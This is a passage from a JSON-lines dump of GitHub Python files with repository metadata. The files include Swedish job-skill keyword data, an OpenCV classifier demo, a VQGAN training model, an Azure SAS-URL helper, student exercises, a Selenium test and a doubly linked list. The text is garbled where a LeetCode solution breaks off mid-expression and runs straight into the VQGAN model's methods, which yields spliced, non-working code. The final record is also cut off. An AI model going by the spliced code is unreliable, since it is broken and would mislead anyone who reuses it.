\"överkalix\": \"överkalix\",\n \"jokkmokk\": \"jokkmokk\",\n \"gällivare\": \"gällivare\",\n \"kiruna\": \"kiruna\",\n \"pajala\": \"kiruna\",\n}\n\nBLACKLIST = [\"svenska\", \"engelska\", \"can\", \"design\", \"data\", \"förvaltning\", \"verktyg\", \"högskoleutbildning\", \"eftergymnasial utbildning\", \"kommunikation\", \"problemlösning\", \"tekniker\", \"general\", \"manager\", \"major\", \"mentor\", \"programmering\", \"egen bil\", \"barn\", \"back end\", \"front end\", \"not\", \"projektledning\", \"eftergymnasial utbildning\", \"miljö\", \"körkort\", \"leverantörer\", \"script\", \"stack\", \"Svenskt medborgarskap\", \"affärssystem\", \"budget\", \"sales\", \"religion\", \"client\", \"tekniker\", \"ingenjör\", \"personalansvarig\", \"project manager\", \"arkitekt\", \"förvaltare\", \"traffic\", \"diskrimineringsombudsman\", \"arbetslivserfarenhet\"]\n","repo_name":"Assedon-AB/digitalskills-data","sub_path":"digspec/static_data.py","file_name":"static_data.py","file_ext":"py","file_size_in_byte":12968,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25625116723","text":"from deel import *\nfrom deel.network import *\nfrom 
deel.network.googlenet import *\nfrom deel.commands import *\nimport cv2\n\ndeel = Deel()\n\nCNN = GoogLeNet()\n\ncam = cv2.VideoCapture(0) \n\nwhile True:\n\tret, img = cam.read() \n\tCNN.Input(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n\tCNN.classify()\n\tShowLabels()\n\n\tcv2.imshow('cam', img)\n\tif cv2.waitKey(10) > 0:\n\t\tbreak\ncam.release()\ncv2.destroyAllWindows()\n","repo_name":"ghelia/deel","sub_path":"examples/openCV.py","file_name":"openCV.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"75"} +{"seq_id":"1083240814","text":"class Solution:\n def mctFromLeafValues(self, arr) -> int:\n res = 0\n for i in range(0, len(arr)-1):\n mn = arr.index(min(arr))\n if 0 self.disc_start_step:\n self.disc_optimizer.zero_grad()\n d_loss.backward()\n self.disc_optimizer.step()\n\n def top_encode(self, x, mask):\n h = self.top_encoder(x)\n h = self.top_quant_conv(h)\n quant, _, _ = self.top_quantize(h, mask)\n quant = self.top_post_quant_conv(quant)\n return quant\n\n def bot_encode(self, x, mask):\n h = self.bot_encoder(x)\n h = self.bot_quant_conv(h)\n quant, emb_loss, info = self.bot_quantize(h, mask)\n quant = self.bot_post_quant_conv(quant)\n bot_dec_res = self.bot_decoder_res(quant)\n return bot_dec_res, emb_loss, info\n\n def decode(self, quant_top, bot_dec_res):\n dec = self.decoder(quant_top, bot_h=bot_dec_res)\n return dec\n\n def forward_step(self, input, mask):\n with torch.no_grad():\n quant_top = self.top_encode(input, mask)\n bot_dec_res, diff, _ = self.bot_encode(input, mask)\n dec = self.decode(quant_top, bot_dec_res)\n return dec, diff\n\n def feed_data(self, data):\n x = data['image'].float().to(self.device)\n mask = data['texture_mask'].float().to(self.device)\n\n return x, mask\n\n def training_step(self, data, step):\n x, mask = self.feed_data(data)\n xrec, codebook_loss = self.forward_step(x, mask)\n\n # get recon/perceptual loss\n recon_loss = torch.abs(x.contiguous() - xrec.contiguous())\n p_loss = self.perceptual(x.contiguous(), xrec.contiguous())\n nll_loss = recon_loss + self.perceptual_weight * p_loss\n nll_loss = torch.mean(nll_loss)\n\n # augment for input to discriminator\n if self.diff_aug:\n xrec = DiffAugment(xrec, policy=self.policy)\n\n # update generator\n logits_fake = self.disc(xrec)\n g_loss = -torch.mean(logits_fake)\n last_layer = self.decoder.conv_out.weight\n d_weight = calculate_adaptive_weight(nll_loss, g_loss, last_layer,\n self.disc_weight_max)\n d_weight *= adopt_weight(1, step, self.disc_start_step)\n loss = nll_loss + d_weight * g_loss + codebook_loss\n\n self.log_dict[\"loss\"] = loss\n self.log_dict[\"l1\"] = recon_loss.mean().item()\n self.log_dict[\"perceptual\"] = p_loss.mean().item()\n self.log_dict[\"nll_loss\"] = nll_loss.item()\n self.log_dict[\"g_loss\"] = g_loss.item()\n self.log_dict[\"d_weight\"] = d_weight\n self.log_dict[\"codebook_loss\"] = codebook_loss.item()\n\n if step > self.disc_start_step:\n if self.diff_aug:\n logits_real = self.disc(\n DiffAugment(x.contiguous().detach(), policy=self.policy))\n else:\n logits_real = self.disc(x.contiguous().detach())\n logits_fake = self.disc(xrec.contiguous().detach(\n )) # detach so that generator isn\"t also updated\n d_loss = hinge_d_loss(logits_real, logits_fake)\n self.log_dict[\"d_loss\"] = d_loss\n else:\n d_loss = None\n\n return loss, d_loss\n\n @torch.no_grad()\n def inference(self, data_loader, save_dir):\n self.bot_encoder.eval()\n self.bot_decoder_res.eval()\n self.decoder.eval()\n 
self.bot_quantize.eval()\n self.bot_quant_conv.eval()\n self.bot_post_quant_conv.eval()\n\n loss_total = 0\n num = 0\n\n for _, data in enumerate(data_loader):\n img_name = data['img_name'][0]\n x, mask = self.feed_data(data)\n xrec, _ = self.forward_step(x, mask)\n\n recon_loss = torch.abs(x.contiguous() - xrec.contiguous())\n p_loss = self.perceptual(x.contiguous(), xrec.contiguous())\n nll_loss = recon_loss + self.perceptual_weight * p_loss\n nll_loss = torch.mean(nll_loss)\n loss_total += nll_loss\n\n num += x.size(0)\n\n if x.shape[1] > 3:\n # colorize with random projection\n assert xrec.shape[1] > 3\n # convert logits to indices\n xrec = torch.argmax(xrec, dim=1, keepdim=True)\n xrec = F.one_hot(xrec, num_classes=x.shape[1])\n xrec = xrec.squeeze(1).permute(0, 3, 1, 2).float()\n x = self.to_rgb(x)\n xrec = self.to_rgb(xrec)\n\n img_cat = torch.cat([x, xrec], dim=3).detach()\n img_cat = ((img_cat + 1) / 2)\n img_cat = img_cat.clamp_(0, 1)\n save_image(\n img_cat, f'{save_dir}/{img_name}.png', nrow=1, padding=4)\n\n return (loss_total / num).item()\n\n def get_current_log(self):\n return self.log_dict\n\n def update_learning_rate(self, epoch):\n \"\"\"Update learning rate.\n\n Args:\n current_iter (int): Current iteration.\n warmup_iter (int): Warmup iter numbers. -1 for no warmup.\n Default: -1.\n \"\"\"\n lr = self.optimizer.param_groups[0]['lr']\n\n if self.opt['lr_decay'] == 'step':\n lr = self.opt['lr'] * (\n self.opt['gamma']**(epoch // self.opt['step']))\n elif self.opt['lr_decay'] == 'cos':\n lr = self.opt['lr'] * (\n 1 + math.cos(math.pi * epoch / self.opt['num_epochs'])) / 2\n elif self.opt['lr_decay'] == 'linear':\n lr = self.opt['lr'] * (1 - epoch / self.opt['num_epochs'])\n elif self.opt['lr_decay'] == 'linear2exp':\n if epoch < self.opt['turning_point'] + 1:\n # learning rate decay as 95%\n # at the turning point (1 / 95% = 1.0526)\n lr = self.opt['lr'] * (\n 1 - epoch / int(self.opt['turning_point'] * 1.0526))\n else:\n lr *= self.opt['gamma']\n elif self.opt['lr_decay'] == 'schedule':\n if epoch in self.opt['schedule']:\n lr *= self.opt['gamma']\n else:\n raise ValueError('Unknown lr mode {}'.format(self.opt['lr_decay']))\n # set learning rate\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = lr\n\n return lr\n","repo_name":"yumingj/Text2Human","sub_path":"models/hierarchy_vqgan_model.py","file_name":"hierarchy_vqgan_model.py","file_ext":"py","file_size_in_byte":14780,"program_lang":"python","lang":"en","doc_type":"code","stars":783,"dataset":"github-code","pt":"75"} +{"seq_id":"18738983185","text":"\n######################################################################\n#\n# Business logic is intended to possess data handling functionality\n# separated from GUI code, i.e.separated from Dash-related code\n# and visualization format (e.g. 
plotly when graphing data)\n#\n# Rule: No dash* import allowed\n#\n# Query database/input for relevant data and necessary ad-hoc\n# calculations for data.\n#\n######################################################################\n\nimport os\nimport requests\nimport pandas as pd\nfrom azure.storage.filedatalake import (\n FileSystemSasPermissions,\n generate_file_system_sas,\n)\nfrom datetime import datetime, timedelta\n\n\nclass SurfaceModel:\n\n source_db = {\n \"1\": \"OW\",\n \"2\": \"PetrelStudio\"\n }\n\n COLORMAP_OPTIONS = {\n \"1\": \"Rainbow\",\n \"2\": \"Physics\",\n \"3\": \"Porosity\",\n \"4\": \"Permeability\",\n \"6\": \"Time/Depth\",\n \"7\": \"Stratigraphy\",\n \"8\": \"Facies\",\n \"9\": \"GasOilWater\",\n \"10\": \"GasWater\",\n \"11\": \"OilWater\",\n \"12\": \"Accent\",\n }\n\n @staticmethod\n def get_user_project(token, projects_df):\n GRAPH_GROUP_URL = os.environ[\"GRAPH_GROUP_URL\"]\n headers = {'Authorization': 'Bearer ' +token}\n result = requests.get( # Use token to call downstream api\n GRAPH_GROUP_URL,\n headers=headers,\n ).json()\n\n resultNextLink = result['@odata.nextLink']\n joined_result = result['value']\n i = 0\n while resultNextLink:\n try:\n nextpageUsersUrl = resultNextLink\n rNext = requests.get(nextpageUsersUrl, headers=headers)\n resultNext = rNext.json()\n joined_result = [*joined_result, *resultNext['value']]\n resultNextLink = resultNext['@odata.nextLink']\n i += 1\n except KeyError:\n print('this is the last page')\n break\n\n projects_df.objectId = projects_df.objectId.str.split(',')\n projects_df = projects_df.explode('objectId')\n\n df = pd.json_normalize(joined_result)\n\n df = df.rename(columns={\"id\": \"objectId\"})\n df = df[['objectId']]\n df_res = pd.merge(df, projects_df, on='objectId')\n return df_res\n\n @staticmethod\n def get_server_names(df):\n df = df[['sourceProjectId', 'sourceDatabase']].drop_duplicates(\n subset=['sourceDatabase'], keep='last')\n res = df.to_dict(orient='records')\n options = [{'label': i['sourceDatabase'], 'value': i['sourceProjectId']}\n for i in res]\n sorted_options = sorted(options, key=lambda x: x[\"label\"])\n return sorted_options\n\n @staticmethod\n def get_project_names(df):\n df = df[['sourceProject', 'sourceProjectId']].drop_duplicates(\n subset=['sourceProjectId'], keep='last') \n res = df.to_dict(orient='records')\n options = [{'label': i['sourceProject'], 'value': i['sourceProjectId']}\n for i in res]\n sorted_options = sorted(options, key=lambda x: x[\"label\"])\n return sorted_options\n\n @staticmethod\n def get_iset_names(df):\n res = df.to_dict(orient='records')\n options = [{'label': i['interpretSetName'], 'value': i['interpretationSetId']}\n for i in res]\n sorted_options = sorted(options, key=lambda x: x[\"label\"])\n return sorted_options\n\n @staticmethod\n def get_grid_names(df):\n res = df.to_dict(orient='records')\n options = [{'label': i['surfaceName'] + \" (GRID_ID: \" + str(i['gridId']) + ')', 'value': i['gridId']}\n for i in res]\n sorted_options = sorted(options, key=lambda x: x[\"label\"])\n return sorted_options\n\n @staticmethod\n def get_sas_token(path):\n AZURE_ACC_NAME = os.environ[\"AZURE_ACC_NAME\"]\n AZURE_PRIMARY_KEY = os.environ[\"AZURE_PRIMARY_KEY\"]\n AZURE_CONTAINER = os.environ[\"AZURE_CONTAINER\"]\n ENV_SUF = os.environ[\"ENV_SUF\"]\n\n token = generate_file_system_sas(\n AZURE_ACC_NAME,\n AZURE_CONTAINER,\n AZURE_PRIMARY_KEY,\n FileSystemSasPermissions(\n write=False, read=True, delete=False),\n datetime.utcnow() + timedelta(days=1),\n )\n\n blob_url = 
'https://' + AZURE_ACC_NAME + '.blob.core.windows.net/' + \\\n AZURE_CONTAINER + '/' + ENV_SUF + path + '?' + token\n\n return blob_url\n","repo_name":"equinor/webviz-spatialdb-v1","sub_path":"webviz_plugin/plugins/surface_map_viewer/_business_logic.py","file_name":"_business_logic.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72733845681","text":"num = int(input(\"Please enter a number : \"))\nn = [\"0\"]\nm = num * n\na = []\nb = ''\nfor i in range(num):\n m[i] = \"1\"\n a.append(m)\n m = num * n\nfor i in a:\n for ii in i:\n b += ii\n if len(i) == num:\n print(b)\n b = ''\n \n\n\n\n \n \n \n \n\n\n\n\n\n","repo_name":"y43560681/y43560681-270201054","sub_path":"lab6/example5.py","file_name":"example5.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30037542628","text":"import matplotlib.pyplot as plt\nimport ForwardSelection\nimport BackwardDeletion\nimport SamSelection\nimport LoadData \ndef formatFeatures(features):\n\tformatted = \"{\"\n\tfor f in range(len(features) - 1):\n\t\tformatted += str(features[f]) + \",\"\n\tformatted += str(features[len(features) - 1])\n\tformatted += \"}\"\n\treturn formatted\ndef userPrompt():\n\tprint(\"Welcome to Sam's Feature Selection Algorithm.\")\n\tfile_loc = input(\"Type in the path of the file to test: \")\n\talgorithm_choice = int(input(\"Enter the number for the algorithm you would like to run.\\n\t1) Forward Selection\\n\t2) Backward Elimination\\n\t3) Sam's Algorithm\\n\\n\"))\n\treturn file_loc, algorithm_choice\n\ndef plot(accuracy_at_level):\n\tfig = plt.figure()\n\tl = list(range(1,len(accuracy_at_level) + 1))\n\tplt.plot(l, accuracy_at_level, 'go')\t\n\tplt.savefig('/Users/samueldominguez/Downloads/2dplt.png')\n\nif __name__ == \"__main__\":\n\tfile_loc, algorithm_choice = userPrompt()\n\tdata = LoadData.loadData(file_loc)\n\tLoadData.normalizeData(data)\n\tN = len(data)\n\tM = len(data[0])\n\tprint(\"There are \" + str(N) + \" datapoints with \" + str(M) + \" features.\")\n\tprint(\"Data has been normalized...\")\n\talgos = [\"Forward Selection\",\"Backward Elemination\",\"Sam's Algorithm\"]\n\tprint(\"Running Nearest Neighboor with \" + algos[algorithm_choice - 1] + \" on the dataset.\\n\")\n\taccuracy_at_level = []\t\n\tfeatures = []\n\taccuracy = -1\n\tif (algorithm_choice == 1):\n\t\t# forward\n\t\tfeatures, accuracy, accuracy_at_level = ForwardSelection.forwardSelection(data)\n\t\tprint(\"A plot of accuracy over number of features is being made and saved.\")\n\t\tplot(accuracy_at_level)\n\telif (algorithm_choice == 2):\n\t\t# backwards\n\t\tfeatures, accuracy, accuracy_at_level = BackwardDeletion.backwardDeletion(data)\n\t\tprint(\"A plot of accuracy over number of features is being made and saved.\")\n\t\tplot(accuracy_at_level)\n\telse:\n\t\t# sam's\n\t\tfeatures, accuracy = SamSelection.samSelection(data);\n\tformatted_features = formatFeatures(features)\n\tprint(\"Finished search!! 
The best feature subset is \" + formatted_features + \" which has an accuracy of \" + str(accuracy*100) + \"%\")\n","repo_name":"sdomi003/NearestNeighboorFeatureSelection","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15802796991","text":"def minPathSum(grid):\n m = len(grid)\n n = len(grid[0])\n dp = [[0 for i in range(n)] for j in range(m)] \n for i in range(m):\n for j in range(n):\n if i == 0 and j == 0:\n dp[i][j] = grid[i][j]\n elif i == 0 and j != 0:\n dp[i][j] = grid[i][j] + dp[i][j-1]\n elif i != 0 and j == 0:\n dp[i][j] = grid[i][j] + dp[i-1][j]\n else:\n dp[i][j] = grid[i][j] + min(dp[max(i-1, 0)][j], dp[i][max(j-1, 0)])\n return dp[m-1][n-1]\n\n# same funda, visualize fo one cell,, how to get min sum,, obvio above and left path check and who\n# ever is min, consider it..like unique path. main apprach is think of smaller ip. this is top\n# down approach of DP","repo_name":"AnchalNigam/Code-Time","sub_path":"DP/new_journey/min_path_sum.py","file_name":"min_path_sum.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8766846371","text":"#!/usr/bin/python2.7\n# -*- coding: utf-8 -*-\nfrom common import config\nfrom testdata.olsm.data_enterprise_modify_introduction import *\nfrom action.action_login import Login\nfrom action.enterprise.action_enterprise_introduction import EnterpriseIntroduction\nimport unittest\nimport time\n\nclass TestEnterpriseModifyIntroduction(unittest.TestCase):\n u'''\n 测试企业修改企业介绍、企业文化、企业组织架构等\n '''\n def setUp(self):\n self.login_page = Login()\n self.modify_introduction_page = EnterpriseIntroduction()\n\n def tearDown(self):\n time.sleep(1)\n self.login_page.quit()\n\n\n def test_modify_introduction_case1(self):\n u'''测试企业修改企业介绍内容'''\n self.assertTrue(self.login_page.open_browser(config.BASE_URL),u\"打开首页失败\")\n r = self.login_page.login(**test_modify_introduction_case1)\n self.assertTrue(r.result, r.msg)\n r = self.modify_introduction_page.modify_introduction(**test_modify_introduction_case1)\n self.assertTrue(r.result, r.msg)\n\n def test_modify_introduction_case2(self):\n u'''测试企业修改企业文化内容'''\n self.assertTrue(self.login_page.open_browser(config.BASE_URL),u\"打开首页失败\")\n r = self.login_page.login(**test_modify_introduction_case2)\n self.assertTrue(r.result, r.msg)\n r = self.modify_introduction_page.modify_culture(**test_modify_introduction_case2)\n self.assertTrue(r.result, r.msg)\n\n\n def test_modify_introduction_case3(self):\n u'''测试企业修改企业组织架构内容'''\n self.assertTrue(self.login_page.open_browser(config.BASE_URL),u\"打开首页失败\")\n r = self.login_page.login(**test_modify_introduction_case3)\n self.assertTrue(r.result, r.msg)\n r = self.modify_introduction_page.modify_structure(**test_modify_introduction_case3)\n self.assertTrue(r.result, r.msg)\n\nif __name__ == '__main__':\n #logging.basicConfig(level=logging.DEBUG)\n\n a = unittest.TestSuite()\n a.addTests(unittest.makeSuite(TestEnterpriseModifyIntroduction))\n b = unittest.TextTestRunner()\n b.run(a)\n #unittest.main()","repo_name":"sunyanhui/autotest","sub_path":"veeker/testsuite/olsm/test_enterprise_modify_introduction.py","file_name":"test_enterprise_modify_introduction.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} 
+{"seq_id":"18313882405","text":"\"\"\"\nGiven a sorted array with Duplicates . Write a program to find LOWER\nBOUND of a TARGET using Binary search Method .\nReturn Index corresponding the element of lower bound element.\nExample :\nInput : - arr = [1,1,1,2,2,3,3,5,5,5,7,7] , Target = 4\nOutput : - 6\ndef Lower_Bound(arr , target):\n\"\"\" \n# write code here \n\narr = [1,1,1,2,2,3,3,5,5,5,7,7]\ntarget = 4\n\ndef Lower_Bound(arr,target):\n prev = -1 \n for i in range (0,len(arr)):\n if (target==arr[i]):\n return i \n elif arr[i] > target:\n return prev\n prev = i \n\nprint(Lower_Bound(arr,target))","repo_name":"aabhishek-chaurasia-au17/MyCoding_Challenge","sub_path":"coding-challenges/week07/day04/Q.1.py","file_name":"Q.1.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"7917427757","text":"import matplotlib.pyplot as plt\nfrom math import pi\nimport math\nimport numpy as np\nimport cv2\nimport io\nfrom PIL import Image\nimport pandas as pd\n\nclass pieradarplot:\n # Set data\n def __init__(self):\n self.group = ['0-30', '30-60', '60-90', '90-120', '120-150', '150-180', '180-210', '210-240', '240-270',\n '270-300', '300-330', '330-360']\n self.colors = ['rosybrown', 'chocolate', 'orange', 'blue', 'pink', 'red', 'lime', 'indigo', 'teal', 'tomato', 'lawngreen', 'aqua']\n\n def fig2img(self, fig):\n buf = io.BytesIO()\n fig.savefig(buf)\n buf.seek(0)\n img = Image.open(buf)\n return img\n\n def avgValues(self, values):\n sum = np.sum(values)\n if sum != 0:\n for i in range(len(values)):\n values[i] = int((values[i]/sum)*100)\n return values\n\n def getanglefromindex(self, index):\n if index == 0:\n return -15, self.colors[index]\n elif index == 1:\n return -45, self.colors[index]\n elif index == 2:\n return -75, self.colors[index]\n elif index == 3:\n return -105, self.colors[index]\n elif index == 4:\n return -135, self.colors[index]\n elif index == 5:\n return -165, self.colors[index]\n elif index == 6:\n return 15, self.colors[index]\n elif index == 7:\n return 45, self.colors[index]\n elif index == 8:\n return 75, self.colors[index]\n elif index == 9:\n return 105, self.colors[index]\n elif index == 10:\n return 135, self.colors[index]\n elif index == 11:\n return 165, self.colors[index]\n\n # def plotblockdirection(self, directionarr, magnitudearr):\n # x = range(10)\n # y = range(10)\n # dirmagarr = np.multiply(directionarr,magnitudearr)\n # max = np.amax(dirmagarr)\n # rng = max * 0.25\n # blocksize = dirmagarr.shape[0]\n # # maxVal = np.amax(directionarr)\n # # directionarr = directionarr/maxVal\n # fig, ax = plt.subplots(nrows=blocksize, ncols=blocksize)\n #\n # for i in range(blocksize):\n # for j in range(blocksize):\n # ax[i, j].axis('off')\n # directions = dirmagarr[i][j]\n # flat = directions.flatten()\n # flat.sort()\n # length = flat[-1]\n # length2 = flat[-2]\n # if length > rng and length2 > rng:\n # index = np.where(directions == length)\n # index2 = np.where(directions == length2)\n # angle, clr = self.getanglefromindex(index[0][0])\n # angle2, clr2 = self.getanglefromindex(index2[0][0])\n # endy = math.sin(math.radians(angle)) * 0.75\n # endx = math.cos(math.radians(angle)) * 0.75\n # endy2 = math.sin(math.radians(angle2)) * 0.75\n # endx2 = math.cos(math.radians(angle2)) * 0.75\n # ax[i, j].set_ylim(ymin=-1, ymax=1)\n # ax[i, j].set_xlim(xmin=-1, xmax=1)\n # ax[i, j].arrow(0, 0, endx, endy, fc=clr, ec=clr, head_width=0.3, head_length=0.2)\n # ax[i, j].arrow(0, 0, 
endx2, endy2, fc=clr2, ec=clr2, head_width=0.3, head_length=0.2)\n # else:\n # index = np.where(directions == length)\n # angle, clr = self.getanglefromindex(index[0][0])\n # endy = math.sin(math.radians(angle)) * 0.75\n # endx = math.cos(math.radians(angle)) * 0.75\n # ax[i, j].set_ylim(ymin=-1, ymax=1)\n # ax[i, j].set_xlim(xmin=-1, xmax=1)\n # ax[i, j].arrow(0, 0, endx, endy, fc=clr, ec=clr, head_width=0.3, head_length=0.2)\n #\n # img = self.fig2img(fig)\n # plt.close()\n # img = np.asarray(img)\n # img = cv2.cvtColor(img, cv2.COLOR_BGRA2BGR)\n # cv2.imshow(\"plot\", img)\n # cv2.waitKey(1)\n\n def plotblockdirection(self, directionarr, magnitudearr):\n x = range(10)\n y = range(10)\n dirmagarr = np.multiply(directionarr,magnitudearr)\n blocksize = dirmagarr.shape[0]\n pdrow = np.zeros_like(dirmagarr)\n max = np.amax(dirmagarr)\n rng = max * 0.05\n fig, ax = plt.subplots(nrows=blocksize, ncols=blocksize)\n counter = 0\n for i in range(blocksize):\n for j in range(blocksize):\n ax[j, i].axis('off')\n directions = dirmagarr[i][j]\n flat = directions.flatten()\n flat.sort()\n length = flat[-1]\n length2 = flat[-2]\n if length > rng and length2 > rng:\n index = np.where(directions == length)\n index2 = np.where(directions == length2)\n pdrow[j][i][index] += 1\n pdrow[j][i][index2] += 1\n angle, clr = self.getanglefromindex(index[0][0])\n angle2, clr2 = self.getanglefromindex(index2[0][0])\n endy = math.sin(math.radians(angle)) * 0.75\n endx = math.cos(math.radians(angle)) * 0.75\n endy2 = math.sin(math.radians(angle2)) * 0.75\n endx2 = math.cos(math.radians(angle2)) * 0.75\n ax[j, i].set_ylim(ymin=-1, ymax=1)\n ax[j, i].set_xlim(xmin=-1, xmax=1)\n ax[j, i].arrow(0, 0, endx, endy, fc=clr, ec=clr, head_width=0.3, head_length=0.2)\n ax[j, i].arrow(0, 0, endx2, endy2, fc=clr2, ec=clr2, head_width=0.3, head_length=0.2)\n elif length > rng:\n index = np.where(directions == length)\n pdrow[j][i][index] += 1\n angle, clr = self.getanglefromindex(index[0][0])\n endy = math.sin(math.radians(angle)) * 0.75\n endx = math.cos(math.radians(angle)) * 0.75\n ax[j, i].set_ylim(ymin=-1, ymax=1)\n ax[j, i].set_xlim(xmin=-1, xmax=1)\n ax[j, i].arrow(0, 0, endx, endy, fc=clr, ec=clr, head_width=0.3, head_length=0.2)\n img = self.fig2img(fig)\n plt.close()\n img = np.asarray(img)\n img = cv2.cvtColor(img, cv2.COLOR_BGRA2BGR)\n cv2.imshow(\"plot\", img)\n cv2.waitKey(1)\n dirs = np.split(pdrow.flatten(), (blocksize ** 2))\n endarr =[]\n for dir in dirs:\n index = np.where(dir == 1)\n if len(index[0]) == 0:\n endarr.append(0)\n endarr.append(0)\n elif len(index[0]) == 1:\n endarr.append(index[0][0])\n endarr.append(0)\n elif len(index[0]) == 2:\n endarr.append(index[0][0])\n endarr.append(index[0][1])\n # print(\"Enter the input : \")\n # value = input()\n endarr.append(3)\n return endarr\n\n def getpieradarplot(self, values):\n values = self.avgValues(values)\n categories = self.group\n N = len(categories)\n angles = np.linspace(0, 2 * pi, N, endpoint=False)\n angles_mids = angles + (angles[1] / 2)\n\n fig = plt.figure(figsize=(6, 6))\n ax = plt.subplot(111, polar=True)\n ax.tick_params(\n axis='both', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=False)\n ax.axis('off')\n ax.set_theta_direction(-1)\n # ax.set_theta_offset(0)\n # ax.set_xticks(angles_mids)\n # ax.set_xticklabels(categories)\n # ax.xaxis.set_minor_locator(FixedLocator(angles))\n\n # Draw 
ylabels\n # ax.set_rlabel_position(90)\n # ax.set_yticks([20, 40, 60, 80, 100])\n # ax.set_yticklabels([\"20\", \"40\", \"60\", \"80\", \"100\"], color=\"black\", size=8)\n # ax.set_ylim(0, 100)\n\n for i in range(12):\n ax.bar(angles_mids[i], values[i], width=angles[1] - angles[0],\n facecolor=self.colors[i], alpha=0.7, edgecolor='k', linewidth=1)\n\n ax.grid(False, axis='x', which='minor')\n ax.grid(False, axis='x', which='major')\n ax.grid(False, axis='y', which='major')\n ax.grid(False, axis='y', which='minor')\n img = self.fig2img(fig)\n plt.close()\n img = np.asarray(img)\n img = cv2.cvtColor(img, cv2.COLOR_BGRA2BGR)\n img = cv2.resize(img,(224,224))\n return img\n\n# x = pieradarplot()\n# x.plotblockdirection([9, 25, 19, 8, 8, 14, 20, 60, 34, 17, 8, 2])","repo_name":"alvachaitanya/CrowdMotion","sub_path":"utils/pieradarplot.py","file_name":"pieradarplot.py","file_ext":"py","file_size_in_byte":8841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20103547398","text":"class Person:\n '''Тут мы как бы пишет ля-ля тополя про сам класс.'''\n\n population = 0\n\n def __init__(self, fname: str, lname: str, old: int):\n '''Инициализация данных.\n Вызывается первым делом при создании экземпляра класса'''\n self.name1 = fname\n self.name2 = lname\n self.age = old\n\n Person.population += 1\n\n def __del__(self):\n '''Вызывается при удалении объекта - экземпляра класса'''\n print(f'{self.name1} ушел, увы :(')\n\n Person.population -= 1\n\n if Person.population == 0:\n print(f'Конец программы, все ушли')\n\n def say_hi(self) -> str:\n '''Крутая функция расскажет о тебе.'''\n return f'Hi, I\\'m {self.name1}. I know you! Your Last name is {self.name2}. Your age is {self.age}'\n\n @staticmethod # Декоратор для ститичного метода класса\n def how_many():\n '''Выводит численность людей. 
Необходимо указать, что это статический метод класса.\n Делается вот так после функции: how_many = staticmetod(how_many)'''\n print(f'Сейчас у нас в гостях - {Person.population}')\n # how_many = staticmethod(how_many)\n\n# ========================================================================================================\n\n\nprint(f'\\n{Person.say_hi.__doc__}')\n# print(Person.__init__.__annotations__) # Выводит аннотацию к magic method __init__\n# print(Person.say_hi.__annotations__)\n\nAndGr = Person('Andrey', 'Grachev', 30)\nprint(AndGr.say_hi())\n# print(f'Пополяция людей достигла - {AndGr.population}')\nPerson.how_many()\n\nYuriLop = Person('Yuri', 'Lopuhin', 32)\nprint(YuriLop.say_hi())\nPerson.how_many()\n\nAlekseyZol = Person('Aleksey', 'Zolotuhin', 34)\nprint(AlekseyZol.say_hi())\nPerson.how_many()\n","repo_name":"OrganizmRU/PyTest","sub_path":"using_class.py","file_name":"using_class.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40286125282","text":"from motorengine import DESCENDING\nfrom app.models.packages import UserPackage, Package\nfrom app.models.schedules import BookedSchedule\nfrom app.models.users import User\nfrom app.helper import create_at_gmt8\nimport tornado.escape\n\ndef find(self):\n user_id = None\n if 'ES-USER-ID' in self.request.headers:\n user_id = self.request.headers['ES-USER-ID']\n else:\n if self.get_secure_cookie('loginUserID'):\n user_id = str(self.get_secure_cookie('loginUserID'), 'UTF-8')\n\n if user_id:\n user = yield User.objects.get(user_id)\n\n if user:\n\n maxScheds = yield BookedSchedule.objects.filter(user_id=user._id).count()\n maxTrans = yield UserPackage.objects.filter(user_id=user._id).count()\n\n schedPage = 0\n transPage = 0\n if self.get_argument('schedPage'):\n schedPage = int(self.get_argument('schedPage'))\n if self.get_argument('transPage'):\n transPage = int(self.get_argument('transPage'))\n\n schedules = yield BookedSchedule.objects.order_by(\"update_at\", direction=DESCENDING) \\\n .filter(user_id=user._id) \\\n .skip(schedPage * 10).limit(10).find_all()\n transactions = yield UserPackage.objects.order_by(\"update_at\", direction=DESCENDING) \\\n .filter(user_id=user._id) \\\n .skip(transPage * 10).limit(10).find_all()\n\n transactions = create_at_gmt8(transactions)\n\n self.render_json({\n 'schedules' : schedules,\n 'transactions' : transactions,\n 'schedsTotal' : maxScheds / 10,\n 'transTotal' : maxTrans / 10\n })\n else:\n self.finish();\n else:\n self.set_status(403)\n self.write('Please sign up or log in to your Electric account.')\n self.finish()\n \n","repo_name":"baseup/electric-studio","sub_path":"app/controllers/api/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70006670324","text":"#!/usr/bin/env python3\n# doublylinkedlist.py\n# Author : Shipra\n\nclass Node():\n def __init__(self,prev=None, data=None, next=None):\n self.data = data\n self.next = next\n self.prev = prev\n\nclass DoublyLL():\n def __init__(self,head=None):\n self.head = head\n\n\n def insertBeginning(self, 